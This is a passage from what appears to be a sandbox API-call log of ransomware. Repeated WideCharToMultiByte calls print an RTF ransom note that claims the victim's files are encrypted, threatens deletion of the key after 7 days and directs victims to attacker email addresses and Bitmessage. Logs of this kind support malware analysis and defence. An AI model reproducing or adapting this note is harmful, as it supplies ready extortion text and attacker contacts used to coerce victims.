emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.622] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.622] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24866c8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 